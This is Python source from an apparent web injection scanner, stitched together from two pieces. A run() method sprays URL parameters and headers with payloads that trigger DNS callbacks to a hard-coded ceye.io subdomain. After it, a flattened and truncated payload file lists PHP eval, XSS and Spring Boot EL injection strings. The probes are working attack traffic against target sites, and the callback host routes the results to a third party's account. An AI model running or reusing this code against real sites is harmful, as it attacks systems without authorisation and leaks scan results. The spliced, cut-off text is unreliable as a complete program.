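def run(self):
    """Send DNS-log probes for every URL in ``self.target_urls``.

    For each target a fresh random marker is generated and prefixed to the
    DNS-log base domain.  That per-target hostname is substituted into the
    payload templates (``payloads_tpl``) and the header templates
    (``headers_tpl``).  ``Pollution.payload_generator`` yields the request
    URLs, which are sent through ``grequests.map``.

    The HTTP responses are discarded.  Presumably a hit shows up only
    out-of-band, as a lookup of the marker hostname in the DNS log, which is
    why ``url => marker`` is logged for each target.

    Returns:
        None.
    """
    # NOTE(review): hard-coded DNS-log identifier (presumably one account's
    # subdomain on the ceye.io service).  Callbacks are recorded under
    # whichever account owns it, so results are visible to that account
    # holder rather than to the person running the scan.  This belongs in
    # configuration.
    dnslog_base = 'dseje4.ceye.io'

    for url in self.target_urls:
        # Random marker that ties a DNS callback to this one target.
        sign = Random.id_generator(size=10)

        # Build the per-target hostname from the unchanged base domain.  The
        # previous code rebound DNSLOG_HOST itself here, so every later
        # target inherited all earlier markers (sign2.sign1.<base>, ...).  A
        # single callback then matched several logged targets, and the name
        # grew with each URL towards the 253-character DNS name limit.
        dnslog_host = '{}.{}'.format(sign, dnslog_base)

        # Fill the payload templates, then add a double-quoted variant of each.
        payloads = [tpl.format(dnslog_host) for tpl in payloads_tpl]
        payloads.extend(['"{}"'.format(item) for item in payloads])

        # Fill the header templates; only Referer also takes the target URL.
        headers = {}
        for name, template in headers_tpl.items():
            if name == 'Referer':
                headers[name] = template.format(url, dnslog_host)
            else:
                headers[name] = template.format(dnslog_host)

        polluter = Pollution(payloads)
        urls = []
        for probe in polluter.payload_generator(url):
            urls.append(probe)
            # Single-argument print(...) prints the same text as the
            # statement form under Python 2.
            print(Url.urldecode(probe))

        # Record which marker belongs to which target for later correlation.
        logging.info('{0} => {1}'.format(url, sign))
        print('Payload Number: {}'.format(len(urls)))

        # Redirects are not followed and the responses are not inspected.
        pending = (
            grequests.get(u, headers=headers, allow_redirects=False)
            for u in urls
        )
        grequests.map(pending, gtimeout=BILID_REQUEST_TIMEOUT)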
#!/usr/bin/env python # -*- encoding: utf-8 -*- from utils import Random, Hash phpinfo_sign = '<a href="http://www.php.net/">' xss_payload = xss_sign = '\'";abcdefg123456' el_sign = Random.id_generator(size=10) el_payload = ','.join(str(ord(i)) for i in el_sign) el_sign2 = '119841162-2' el2_payload = el_sign2 # Command Execute Payloads payloads = [ { 'name': 'PHP Code eval', 'payload': 'phpinfo();', 'sign': phpinfo_sign }, { 'name': 'PHP Code eval', 'payload': '${print_r(md5(11123))};', 'sign': Hash.md5('11123') }, { 'name': 'Sprint Boot EL', 'payload': '${{new java.lang.String(new byte[]{{{0}}})}}'.format( el_payload),